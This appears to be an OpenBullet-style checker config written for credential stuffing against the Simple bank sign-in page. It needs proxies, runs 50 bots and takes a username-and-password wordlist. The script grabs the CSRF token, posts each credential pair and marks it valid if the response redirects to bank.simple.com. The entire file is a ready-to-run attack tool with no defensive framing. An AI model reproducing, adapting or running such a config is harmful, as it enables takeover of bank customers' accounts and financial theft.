[SETTINGS]
{
  "Name": "Simplebank",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-06-15T23:30:26.5186254+00:00",
  "AdditionalInfo": "",
  "Author": "sam",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://signin.simple.com/" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: signin.simple.com" 
  HEADER "Origin: https://signin.simple.com" 
  HEADER "Referer: https://signin.simple.com/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"_csrf\" value=\"" "\" />" -> VAR "_CSRF" 

REQUEST POST "https://signin.simple.com/" 
  CONTENT "_csrf=<_CSRF>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: signin.simple.com" 
  HEADER "Origin: https://signin.simple.com" 
  HEADER "Referer: https://signin.simple.com/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Your username and password don't match, please try again" 
  KEYCHAIN Success OR 
    KEY "https://bank.simple.com" 

